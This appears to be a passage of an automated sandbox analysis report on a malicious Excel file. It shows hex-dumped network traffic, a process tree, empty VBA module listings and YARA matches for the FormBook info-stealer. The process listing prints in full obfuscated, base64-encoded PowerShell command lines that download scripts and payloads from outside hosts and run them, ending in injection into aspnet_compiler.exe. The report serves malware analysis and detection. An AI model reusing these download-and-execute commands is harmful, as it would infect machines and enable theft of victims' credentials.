                                                            2024-12-02 06:29:11 UTC8192INData Raw: 38 19 cc 09 50 64 16 48 eb 96 8a 01 2a 72 76 d7 eb 8c c5 18 12 86 99 18 23 0a 02 b8 18 cc d0 c4 b2 03 65 29 76 82 3b 8c 0c d3 09 40 49 0a c2 e8 73 95 68 dd 58 18 f6 af c9 b0 ce ca 5b 6a a8 60 0f 6e f9 c1 0b be dd a3 69 e0 81 80 b4 bb d5 b9 21 af 06 01 62 0d 0f cf 1d 4d 23 b8 65 28 d4 bc 0f 8e 0d f4 cf 13 1b 8d a8 0c 01 02 0c 4c a1 45 df 5c 09 14 79 c7 a4 45 83 61 11 93 bc 6e c5 64 52 18 92 b5 b8 d8 17 80 2a c6 b4 b1 99 37 25 75 ca e9 e0 67 6d c5 09 50 73 52 24 48 68 f9 44 b3 77 1d f0 00 be 1c 8d 09 7d c4 1b e9 8e 26 91 5f 44 04 67 d4 3a 7b 93 f1 cd 08 d0 08 8b 88 5b 81 7c f7 39 63 ab 54 8e 35 8e 05 5e 79 38 19 51 46 9a 92 f1 3a 95 65 50 2c 71 cd f2 79 c1 6a 22 68 11 63 0d 61 01 5d c0 f3 d7 34 a4 68 e7 76 21 29 82 51 23 bf 3d 71 72 10 25 94 e5 4e db 27 ae
                                                            Data Ascii: 8PdH*rv#e)v;@IshX[j`ni!bM#e(LE\yEandR*7%ugmPsR$HhDw}&_Dg:{[|9cT5^y8QF:eP,qyj"hca]4hv!)Q#=qr%N'
                                                            2024-12-02 06:29:11 UTC8192INData Raw: f4 06 2d 37 9d 12 9d 9b 80 3e ac 4f 49 23 51 40 85 ab 91 5d 8e 07 b3 dc 86 65 71 18 6d a7 d2 4f 61 db 17 3a 58 9b 52 66 2b ea 3c 11 db ae 03 45 ac f3 f4 b1 06 a5 23 d2 c0 9a e7 1e 8e 30 ef 74 c3 67 35 5c 1f ae 01 07 2c c3 d2 a0 0d a3 28 c4 c6 a5 c4 4e c6 c2 9d bd 4f 38 c4 70 29 66 91 63 60 58 5b 5f 7c e3 26 d1 75 c5 50 18 19 fa b1 a4 69 94 f9 32 09 d0 12 c0 2f 0c 2b 8b c4 f5 7a 38 27 89 de 3d 30 69 5b e3 ca f1 ed 9b f0 c7 68 f2 79 45 b7 f3 c7 c0 e2 5a f9 d6 1d 36 d0 8e ac 0e ef 4d 5d 76 c0 ca f0 9d 1c 7a 4f 14 d2 c4 ed 73 95 2c 4f f8 7d 2d fd b3 d4 c4 cf 26 9d de 66 20 ab 12 0f 4e 33 cd 78 76 ad e7 f1 18 5e 54 6b 24 ae e3 d3 a1 eb 9e 8b 50 ae 63 6f 2c da b2 95 e7 b6 00 60 9d f5 b0 4f 1a 3f 97 21 6a 46 6e e3 3c b6 a3 57 ad d1 6b 0c 33 3b 20 56 ea 7a 37 39
                                                            Data Ascii: -7>OI#Q@]eqmOa:XRf+<E#0tg5\,(NO8p)fc`X[_|&uPi2/+z8'=0i[hyEZ6M]vzOs,O}-&f N3xv^Tk$Pco,`O?!jFn<Wk3; Vz79
                                                            2024-12-02 06:29:11 UTC8192INData Raw: 21 75 91 22 59 49 2d 61 83 6d b1 d0 55 6e f8 e4 7d e6 4f 2b 66 e5 a2 08 b2 06 e1 d6 c0 35 60 73 90 fa c9 9c 28 14 aa aa ab 55 77 b4 0e bf 0e 30 2c fa 78 a1 05 ce f2 00 8a 80 6a 3b 99 6c f3 f4 c4 f5 0a 63 9a 48 c9 e5 58 af cc 03 86 3a c9 83 17 f3 03 12 14 10 ca 0d d0 e3 8c 59 9c c8 cd 64 96 63 64 93 d4 e0 51 48 0c 2f a0 cd 4d 3e 8c 6b 5d 3c b7 50 cc c3 d2 48 15 c7 c7 33 50 ec 70 dd 6b 36 34 8e 4c aa e8 42 fa a3 e8 4d 8f 49 be d8 06 1b 3c a5 69 91 54 af a4 95 37 b8 5f 04 f3 8b 6b a2 02 64 a3 4b d8 91 d3 e9 96 4a 58 4b 79 ac 15 40 24 df 3d 7e 23 29 20 fb c2 a5 b9 a6 70 ad 62 88 3f d7 00 2f 0a c0 4a f9 85 9c a9 53 c7 e1 3d 70 02 0d ac 40 e7 a7 27 db 2d 2f 96 aa c1 0b 07 56 3b ac f0 d7 9c ec cc 1c 79 85 8a d1 f6 b1 58 01 54 69 5c db 50 b3 c9 3d 32 bb 0e e0 07
                                                            Data Ascii: !u"YI-amUn}O+f5`s(Uw0,xj;lcHX:YdcdQH/M>k]<PH3Ppk64LBMI<iT7_kdKJXKy@$=~#) pb?/JS=p@'-/V;yXTi\P=2
                                                            2024-12-02 06:29:11 UTC8192INData Raw: 41 f4 56 ff 00 d5 98 ca 78 a1 92 2f 70 c0 d6 93 ed 0e bc 72 89 09 3f 15 6f fd 59 49 3e d2 eb d5 15 9a 08 38 fc 44 29 ff 00 d5 99 e5 ab 80 6b 29 23 6e e0 9b 07 8c 0d 78 fe d1 ea 9c 06 11 c4 41 ff 00 2b 7f ea ce 1f 69 75 8c 48 f2 e1 00 7b ab 7f ea cc 42 5a 3a 28 c2 ba 10 72 ea ca 58 75 b3 f9 60 6d 0f 1d d4 b8 63 b2 05 50 38 01 5b 9f fc 58 6d 5f 8b ea 56 14 6a 8b 6f 5a da dd 6b fd ec c2 de a7 83 84 d5 ea 12 58 d1 0d d2 fb 60 6a 45 e3 5a 93 15 85 89 7e 1b 5b 9f d7 05 ff 00 c4 5a c8 9a 8c 70 8f 9a b7 3f ae 66 a1 60 a1 d0 31 5e d7 95 91 83 7e 21 47 df 03 5c fd a4 d6 37 58 74 d7 d8 ed 6b ff 00 cd 99 5a 9d 42 ce ed 23 46 aa 5b f1 6d ba 27 df 92 70 61 2a 2b dd 67 b6 0a 6b 11 30 3d eb f9 e0 54 4e 88 0d 7a 89 ca c7 3b 33 ed 23 86 e3 07 14 5e 63 10 4d 57 be 11 f4 bb
                                                            Data Ascii: AVx/pr?oYI>8D)k)#nxA+iuH{BZ:(rXu`mcP8[Xm_VjoZkX`jEZ~[Zp?f`1^~!G\7XtkZB#F[m'pa*+gk0=TNz;3#^cMW
                                                            2024-12-02 06:29:11 UTC8192INData Raw: eb 80 16 90 a4 8b b9 46 de 84 9e de d9 1b 9d f5 31 a0 56 62 cd b7 d2 b6 40 f8 0e f9 9f a8 d6 ac aa 55 03 12 4d fb 66 86 86 67 4d 46 9b 51 40 3c 6e ae 55 bf 8a 8d d5 e0 7a 76 fb 1e b2 b8 77 f1 07 da 2c 8a 88 f2 6c 71 f8 b1 f3 f6 41 15 09 1a d2 19 89 24 98 f8 e7 fe 2c ca 4f b4 88 fa f4 69 b4 f1 ab 21 25 49 70 78 26 88 fc 37 5c ee e2 bf 0f d3 17 f1 7f b6 fe 25 0c cb 14 0d a4 23 6e e2 ea 8d d4 9e 9e aa e9 f2 c0 d0 8b ec e2 6a a4 95 13 5e 08 8d b6 86 10 d8 35 d4 83 ba b8 36 3e 04 66 80 fb 11 a7 a8 a5 6d 7c a2 3a da ca 10 6e 2d 47 90 7b 7e 47 3c b7 87 fd b2 d5 a6 a2 41 21 d1 42 8e db c8 68 98 aa 9f e2 00 2d 9f 51 25 8f c6 f3 7e 2f b6 0f 24 71 a0 d5 f8 63 11 d4 04 99 5a ab 8a f4 9e 87 01 6f b4 be 11 e1 5e 09 e1 32 c9 b1 a6 92 40 a8 8a ee 78 20 75 e2 bd f0 bf 65
                                                            Data Ascii: F1Vb@UMfgMFQ@<nUzvw,lqA$,Oi!%Ipx&7\%#nj^56>fm|:n-G{~G<A!Bh-Q%~/$qcZo^2@x ue
                                                            2024-12-02 06:29:11 UTC8192INData Raw: 77 18 b6 eb 60 4e 05 b7 11 5b bd b8 39 3c 94 ad 86 c7 f1 67 06 43 d4 b0 39 61 25 3f 72 b8 15 0a 40 00 8a c2 20 2a 6c 9a c3 b8 47 8c 30 e6 87 e5 80 00 f7 36 3d fd b0 38 90 58 ee dd cf 7c bc 50 b3 ab 51 20 0e 09 38 23 4a c0 ef be 7d b1 b4 2c 61 20 74 ea 6b 01 27 4a 60 a1 79 ef 96 2c 7d 23 6f 00 59 18 f5 22 c3 b9 56 df 16 30 1d bc 35 92 6f fe 98 00 2e 59 85 70 07 4c 32 15 5e 88 6f f8 58 0e 0e 0d a2 da dc 91 cf 51 8c e9 ca 83 19 91 bd 1b 49 f6 a3 78 05 2a 59 95 c4 65 5c 0f 50 ae 0f 18 67 54 3a 6b 0a 43 b7 6e e7 2b 33 bc 4c 5e 36 dd b8 5f 1c f1 82 4d 5a 3a 94 92 3d a6 ef 77 5a c0 4d 96 40 e1 c8 22 8f 52 33 5e 27 f3 21 d9 18 62 c4 75 3d b3 37 52 e0 c6 42 22 95 bb 0c 07 39 48 f5 93 47 d0 90 0f b6 03 fb 25 da 54 b9 a5 e4 df 19 d2 38 30 87 95 d4 b0 fc 23 07 a6 d4
                                                            Data Ascii: w`N[9<gC9a%?r@ *lG06=8X|PQ 8#J},a tk'J`y,}#oY"V05o.YpL2^oXQIx*Ye\PgT:kCn+3L^6_MZ:=wZM@"R3^'!bu=7RB"9HG%T80#
                                                            2024-12-02 06:29:11 UTC8192INData Raw: 1d a1 d5 09 0c de 60 62 41 20 1f c3 7d 6b 14 48 24 91 0c 8a 37 2d 16 3c 80 48 03 93 47 b7 6c e5 d2 cd 20 42 36 d3 32 80 a1 80 22 f8 04 8b b0 30 0a 0c 07 48 db b9 98 35 2f 24 6e 1d 6f e9 55 ff 00 16 5a f4 6a d0 0d b4 0a 92 ed 6d 5b b6 d0 07 bd 58 0c 6b 9a 62 3b 60 23 d2 bc 88 ac bb 44 6d 62 c9 00 02 2b f1 13 40 75 19 03 4f 21 12 7a 05 46 00 66 24 50 b0 6b 9e 95 80 e4 92 e9 18 c8 a3 ca 4a d3 ed 04 2b 51 70 f6 6a ec f2 01 16 79 e7 29 aa 7d 33 ee 78 96 25 2c fb 82 a2 b5 a8 37 c1 be 2f a7 4c 5a 68 9e 16 3e 64 61 68 d1 00 8e 3d b8 be 32 a1 b7 b0 55 51 67 a0 3d f0 2f a7 2a 24 0c 58 a8 a2 2c 13 dc 11 cd 76 f7 f8 5e 68 7d e6 35 88 ac 72 6c 5f bb f9 67 6d d6 ed f6 6a fe 17 d7 32 84 12 34 42 40 14 0e 48 05 80 26 8f 34 3a 9c 1a b0 0b 43 92 dc fc b0 34 f5 3a 94 10 33
                                                            Data Ascii: `bA }kH$7-<HGl B62"0H5/$noUZjm[Xkb;`#Dmb+@uO!zFf$PkJ+Qpjy)}3x%,7/LZh>dah=2UQg=/*$X,v^h}5rl_gmj24B@H&4:C4:3
                                                            2024-12-02 06:29:11 UTC8192INData Raw: 13 db 17 95 65 63 b2 43 f8 78 c0 76 27 89 e4 f3 66 00 ad 51 56 3c 2f f7 c1 3c 7a 3d 3d a1 da c8 c7 76 da 2d db df 15 01 96 e8 f5 fa e7 32 17 6d cd c9 aa e9 81 29 34 01 76 b4 60 80 78 3b 7b 63 08 b2 70 c5 53 69 e9 cf 41 f9 60 12 26 24 00 a0 fd 31 83 1c 8c 95 b4 a8 1d 41 e8 70 00 5d de 67 58 90 3a 01 c0 6e c4 73 7f a6 71 78 a5 01 1a 2d 8d 56 42 8a e7 e1 86 8a 12 84 9a 20 9c a9 88 99 37 b7 22 ee c6 00 c6 9e 5f bb 28 2e c5 8b 7a 40 36 70 b0 ab bc b1 c2 5b d4 0b 7a 88 eb 78 c4 0d 72 2b 46 ca ac aa 54 06 07 be 40 d2 56 a8 53 82 6f a1 27 8c 03 19 6a 65 2c 69 8b ec 23 e0 06 1d a4 0a 36 16 0a 84 10 5a b9 07 b6 55 a0 24 f9 b2 d9 0a 79 00 73 ed 7f 1c 95 8d 9e 59 15 56 96 81 56 61 c1 04 57 4c 0c ff 00 13 9e 51 e5 02 77 46 56 98 a8 e1 be 38 ac a2 99 d2 95 4b 05 a5 51
                                                            Data Ascii: ecCxv'fQV</<z==v-2m)4v`x;{cpSiA`&$1Ap]gX:nsqx-VB 7"_(.z@6p[zxr+FT@VSo'je,i#6ZU$ysYVVaWLQwFV8KQ


                                                            Statistics

                                                            CPU Usage

                                                            Click to jump to process

                                                            Memory Usage

                                                            Click to jump to process

                                                            High Level Behavior Distribution

                                                            Click to dive into process behavior distribution

                                                            Behavior

                                                            Click to jump to process

                                                            System Behavior

                                                            General

                                                            Target ID:0
                                                            Start time:01:27:57
                                                            Start date:02/12/2024
                                                            Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                            Wow64 process (32bit):false
                                                            Commandline:"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                                                            Imagebase:0x13fc10000
                                                            File size:28'253'536 bytes
                                                            MD5 hash:D53B85E21886D2AF9815C377537BCAC3
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:false

                                                            General

                                                            Target ID:4
                                                            Start time:01:28:51
                                                            Start date:02/12/2024
                                                            Path:C:\Windows\System32\mshta.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\System32\mshta.exe -Embedding
                                                            Imagebase:0x13fe90000
                                                            File size:13'824 bytes
                                                            MD5 hash:95828D670CFD3B16EE188168E083C3C5
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            General

                                                            Target ID:6
                                                            Start time:01:28:56
                                                            Start date:02/12/2024
                                                            Path:C:\Windows\System32\cmd.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:"C:\Windows\system32\cmd.exe" "/c pOwErSHelL.exE -ex BYpASS -NOp -w 1 -C dEVICeCreDENtialDePLOYMENT ; iNVOkE-eXPREsSioN($(InvOKE-EXpReSSiON('[syStEM.TeXT.eNCODiNG]'+[CHaR]0X3A+[chAr]0x3A+'utf8.geTstrINg([SYSTem.CoNverT]'+[CHar]0X3A+[ChAr]0x3A+'fRoMbASE64sTriNG('+[ChAr]34+'JFFwa0tZNkUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFEZC10WXBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVtQmVSZGVmaU5JdGlvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVyTG1vbi5kTEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSlF6LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgemMsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBUV2lKbWZpekcsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcE1qdXRlSyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGhHSWR3ZngpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiYUFpTXpoIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUVTcEFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSG1QTWMgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRRcGtLWTZFOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTcyLjI0NS4xMjMuMTIvMzYxL3NlZW1lYmVzdHRoaW5nc2VudGlyZWxpZmVnaXZlbmJhY2t3aXRoZ29vZC50SUYiLCIkZW52OkFQUERBVEFcc2VlbWViZXN0dGhpbmdzZW50aXJlbGlmZWdpdmVuYmFjLnZiUyIsMCwwKTtTVEFydC1zTEVFcCgzKTtJaSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFTlY6QVBQREFUQVxzZWVtZWJlc3R0aGluZ3NlbnRpcmVsaWZlZ2l2ZW5iYWMudmJTIg=='+[chaR]34+'))')))"
                                                            Imagebase:0x4aae0000
                                                            File size:345'088 bytes
                                                            MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            General

                                                            Target ID:8
                                                            Start time:01:28:56
                                                            Start date:02/12/2024
                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:pOwErSHelL.exE -ex BYpASS -NOp -w 1 -C dEVICeCreDENtialDePLOYMENT ; iNVOkE-eXPREsSioN($(InvOKE-EXpReSSiON('[syStEM.TeXT.eNCODiNG]'+[CHaR]0X3A+[chAr]0x3A+'utf8.geTstrINg([SYSTem.CoNverT]'+[CHar]0X3A+[ChAr]0x3A+'fRoMbASE64sTriNG('+[ChAr]34+'JFFwa0tZNkUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFEZC10WXBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVtQmVSZGVmaU5JdGlvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVyTG1vbi5kTEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSlF6LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgemMsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBUV2lKbWZpekcsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcE1qdXRlSyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGhHSWR3ZngpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiYUFpTXpoIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUVTcEFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSG1QTWMgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRRcGtLWTZFOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTcyLjI0NS4xMjMuMTIvMzYxL3NlZW1lYmVzdHRoaW5nc2VudGlyZWxpZmVnaXZlbmJhY2t3aXRoZ29vZC50SUYiLCIkZW52OkFQUERBVEFcc2VlbWViZXN0dGhpbmdzZW50aXJlbGlmZWdpdmVuYmFjLnZiUyIsMCwwKTtTVEFydC1zTEVFcCgzKTtJaSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFTlY6QVBQREFUQVxzZWVtZWJlc3R0aGluZ3NlbnRpcmVsaWZlZ2l2ZW5iYWMudmJTIg=='+[chaR]34+'))')))"
                                                            Imagebase:0x13fcd0000
                                                            File size:443'392 bytes
                                                            MD5 hash:A575A7610E5F003CC36DF39E07C4BA7D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:moderate
                                                            Has exited:true

                                                            General

                                                            Target ID:9
                                                            Start time:01:29:00
                                                            Start date:02/12/2024
                                                            Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\akgiliwf\akgiliwf.cmdline"
                                                            Imagebase:0x13f300000
                                                            File size:2'758'280 bytes
                                                            MD5 hash:23EE3D381CFE3B9F6229483E2CE2F9E1
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:moderate
                                                            Has exited:true

                                                            General

                                                            Target ID:10
                                                            Start time:01:29:00
                                                            Start date:02/12/2024
                                                            Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES2DE4.tmp" "c:\Users\user\AppData\Local\Temp\akgiliwf\CSC107B8B87724F4FE1A74D28EF2C06A4.TMP"
                                                            Imagebase:0x13fd70000
                                                            File size:52'744 bytes
                                                            MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            General

                                                            Target ID:12
                                                            Start time:01:29:06
                                                            Start date:02/12/2024
                                                            Path:C:\Windows\System32\wscript.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seemebestthingsentirelifegivenbac.vbS"
                                                            Imagebase:0xff560000
                                                            File size:168'960 bytes
                                                            MD5 hash:045451FA238A75305CC26AC982472367
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            General

                                                            Target ID:13
                                                            Start time:01:29:06
                                                            Start date:02/12/2024
                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $alastrar = 'JGVzdHJlbGVqYXIgPSAnaHR0cHM6Ly8xMDE2LmZpbGVtYWlsLmNvbS9hcGkvZmlsZS9nZXQ/ZmlsZWtleT1IVFVHX0V5cnVEUjBPQVpIMEhISnllcFVyWFN2Rl9pNmo4YndlVGVXQkN1MTl4Y2JqUU41VGtzYTRPRzBNcWNjcVdOTGxnJnBrX3ZpZD1lMDEwOTYzOGM5YmZiOTU3MTczMjc5NDM1NmExZmY2YyAnOyRhbWJpZ3VpZGFkZSA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7JGVudHJhZGFuaGEgPSAkYW1iaWd1aWRhZGUuRG93bmxvYWREYXRhKCRlc3RyZWxlamFyKTskYm9ybmVjbyA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCRlbnRyYWRhbmhhKTskbGlxdWlkaWZpY2FyID0gJzw8QkFTRTY0X1NUQVJUPj4nOyRwaW50b3JhID0gJzw8QkFTRTY0X0VORD4+JzskY2hvdXZpciA9ICRib3JuZWNvLkluZGV4T2YoJGxpcXVpZGlmaWNhcik7JGltbWVyZ2lyID0gJGJvcm5lY28uSW5kZXhPZigkcGludG9yYSk7JGNob3V2aXIgLWdlIDAgLWFuZCAkaW1tZXJnaXIgLWd0ICRjaG91dmlyOyRjaG91dmlyICs9ICRsaXF1aWRpZmljYXIuTGVuZ3RoOyRmcnV0aWZpY2FyID0gJGltbWVyZ2lyIC0gJGNob3V2aXI7JGJ1c3NvbGNvID0gJGJvcm5lY28uU3Vic3RyaW5nKCRjaG91dmlyLCAkZnJ1dGlmaWNhcik7JHF1aW5pY2EgPSAtam9pbiAoJGJ1c3NvbGNvLlRvQ2hhckFycmF5KCkgfCBGb3JFYWNoLU9iamVjdCB7ICRfIH0pWy0xLi4tKCRidXNzb2xjby5MZW5ndGgpXTskYmVpcmFtZSA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJHF1aW5pY2EpOyRzYWlkb3IgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRiZWlyYW1lKTskZW5nb3JkdXJhciA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoJ1ZBSScpOyRlbmdvcmR1cmFyLkludm9rZSgkbnVsbCwgQCgndHh0LkFSRU5MRVQvMTYzLzIxLjMyMS41NDIuMjcxLy86cHR0aCcsICckZGFkYW5lJywgJyRkYWRhbmUnLCAnJGRhZGFuZScsICdhc3BuZXRfY29tcGlsZXInLCAnJGRhZGFuZScsICckZGFkYW5lJywnJGRhZGFuZScsJyRkYWRhbmUnLCckZGFkYW5lJywnJGRhZGFuZScsJyRkYWRhbmUnLCcxJywnJGRhZGFuZScpKTs=';$morfose = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($alastrar));Invoke-Expression $morfose
                                                            Imagebase:0x13fcd0000
                                                            File size:443'392 bytes
                                                            MD5 hash:A575A7610E5F003CC36DF39E07C4BA7D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:moderate
                                                            Has exited:true

                                                            General

                                                            Target ID:16
                                                            Start time:01:29:26
                                                            Start date:02/12/2024
                                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
                                                            Imagebase:0x8d0000
                                                            File size:55'384 bytes
                                                            MD5 hash:A1CC6D0A95AA5C113FA52BEA08847010
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000010.00000002.553925557.0000000000150000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000010.00000002.553925557.0000000000150000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000010.00000002.554015274.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000010.00000002.554015274.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                            Reputation:moderate
                                                            Has exited:true

                                                            Disassembly

                                                            Code Analysis

                                                            Call Graph

                                                            • Entrypoint
                                                            • Decryption Function
                                                            • Executed
                                                            • Not Executed
                                                            • Show Help
                                                            callgraph 1 Error: Graph is empty

                                                            Module: Sheet1

                                                            Declaration
                                                            LineContent
                                                            1

                                                            Attribute VB_Name = "Sheet1"

                                                            2

                                                            Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"

                                                            3

                                                            Attribute VB_GlobalNameSpace = False

                                                            4

                                                            Attribute VB_Creatable = False

                                                            5

                                                            Attribute VB_PredeclaredId = True

                                                            6

                                                            Attribute VB_Exposed = True

                                                            7

                                                            Attribute VB_TemplateDerived = False

                                                            8

                                                            Attribute VB_Customizable = True

                                                            9

                                                            Attribute VB_Name = "Sheet1"

                                                            10

                                                            Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"

                                                            11

                                                            Attribute VB_GlobalNameSpace = False

                                                            12

                                                            Attribute VB_Creatable = False

                                                            13

                                                            Attribute VB_PredeclaredId = True

                                                            14

                                                            Attribute VB_Exposed = True

                                                            15

                                                            Attribute VB_TemplateDerived = False

                                                            16

                                                            Attribute VB_Customizable = True

                                                            Module: Sheet2

                                                            Declaration
                                                            LineContent
                                                            1

                                                            Attribute VB_Name = "Sheet2"

                                                            2

                                                            Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"

                                                            3

                                                            Attribute VB_GlobalNameSpace = False

                                                            4

                                                            Attribute VB_Creatable = False

                                                            5

                                                            Attribute VB_PredeclaredId = True

                                                            6

                                                            Attribute VB_Exposed = True

                                                            7

                                                            Attribute VB_TemplateDerived = False

                                                            8

                                                            Attribute VB_Customizable = True

                                                            9

                                                            Attribute VB_Name = "Sheet2"

                                                            10

                                                            Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"

                                                            11

                                                            Attribute VB_GlobalNameSpace = False

                                                            12

                                                            Attribute VB_Creatable = False

                                                            13

                                                            Attribute VB_PredeclaredId = True

                                                            14

                                                            Attribute VB_Exposed = True

                                                            15

                                                            Attribute VB_TemplateDerived = False

                                                            16

                                                            Attribute VB_Customizable = True

                                                            Module: ThisWorkbook

                                                            Declaration
                                                            LineContent
                                                            1

                                                            Attribute VB_Name = "ThisWorkbook"

                                                            2

                                                            Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"

                                                            3

                                                            Attribute VB_GlobalNameSpace = False

                                                            4

                                                            Attribute VB_Creatable = False

                                                            5

                                                            Attribute VB_PredeclaredId = True

                                                            6

                                                            Attribute VB_Exposed = True

                                                            7

                                                            Attribute VB_TemplateDerived = False

                                                            8

                                                            Attribute VB_Customizable = True

                                                            9

                                                            Attribute VB_Name = "ThisWorkbook"

                                                            10

                                                            Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"

                                                            11

                                                            Attribute VB_GlobalNameSpace = False

                                                            12

                                                            Attribute VB_Creatable = False

                                                            13

                                                            Attribute VB_PredeclaredId = True

                                                            14

                                                            Attribute VB_Exposed = True

                                                            15

                                                            Attribute VB_TemplateDerived = False

                                                            16

                                                            Attribute VB_Customizable = True

                                                            Reset < >

                                                              Executed Functions

